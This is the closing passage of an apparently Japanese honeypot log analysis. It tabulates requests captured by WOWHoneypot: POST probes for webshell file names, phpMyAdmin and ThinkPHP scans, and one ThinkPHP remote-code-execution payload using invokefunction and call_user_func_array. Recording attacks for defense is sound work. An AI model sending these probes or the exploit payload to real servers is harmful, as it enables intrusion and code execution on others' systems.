299. WebShellの探査 POST /aaa.php HTTP/1.1 1 - 0 +1
300. WebShellの探査 POST /Administrator.php HTTP/1.1 1 - 0 +1
301. WebShellの探査 POST /liangchen.php HTTP/1.1 1 - 0 +1
302. WebShellの探査 POST /meng.php HTTP/1.1 1 - 0 +1
303. WebShellの探査 POST /no.php HTTP/1.1 1 - 0 +1
304. WebShellの探査 POST /mysql.php HTTP/1.1 1 - 0 +1
305. WebShellの探査 POST /Updata.php HTTP/1.1 1 - 0 +1
306. WebShellの探査 POST /xxxx.php HTTP/1.1 1 - 0 +1
307. WebShellの探査 POST /coon.php HTTP/1.1 1 - 0 +1
308. WebShellの探査 POST /zxc0.php HTTP/1.1 1 - 0 +1
309. WebShellの探査 POST /zxc2.php HTTP/1.1 1 - 0 +1
310. WebShellの探査 POST /indexa.php HTTP/1.1 1 - 0 +1
311. WebShellの探査 POST /lx.php HTTP/1.1 1 - 0 +1
312. WebShellの探査 POST /cn.php HTTP/1.1 1 - 0 +1
313. WebShellの探査 POST /index1.php HTTP/1.1 1 - 0 +1
314. WebShellの探査 POST /info.php HTTP/1.1 1 - 0 +1
315. WebShellの探査 POST /info1.php HTTP/1.1 1 - 0 +1
316. WebShellの探査 POST /aaaaaa1.php HTTP/1.1 1 - 0 +1
317. WebShellの探査 POST /up.php HTTP/1.1 1 - 0 +1
318. WebShellの探査 POST /fb.php HTTP/1.1 1 - 0 +1
319. WebShellの探査 POST /cnm.php HTTP/1.1 1 - 0 +1
320. WebShellの探査 POST /51.php HTTP/1.1 1 - 0 +1
321. WebShellの探査 POST /cadre.php HTTP/1.1 1 - 0 +1
322. WebShellの探査 POST /mm.php HTTP/1.1 1 - 0 +1
323. WebShellの探査 POST /1q.php HTTP/1.1 1 - 0 +1
324. WebShellの探査 POST /1111.php HTTP/1.1 1 - 0 +1
325. WebShellの探査 POST /errors.php HTTP/1.1 1 - 0 +1
326. phpMyAdminの探査 GET /s/index.php HTTP/1.1 1 - 0 +1
327. phpMyAdminの探査 GET /phpMyAdmins/index.php HTTP/1.1 1 - 0 +1
328. phpMyAdminの探査 GET /mysql/sqlmanager/index.php HTTP/1.1 1 - 0 +1
329. ThinkPHPの探査 GET /TP/public/index.php HTTP/1.1 1 - 0 +1
330. ThinkPHPの脆弱性を利用した攻撃(参照) GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1 1 - 0 +1
331. ThinkPHPの脆弱性を利用した攻撃(参照) POST /TP/public/index.php?s=captcha HTTP/1.1 1 - 0 +1
332. 不明 GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1 1 - 0 +1

WOWHoneypotで取得したログの簡易分析は以上です。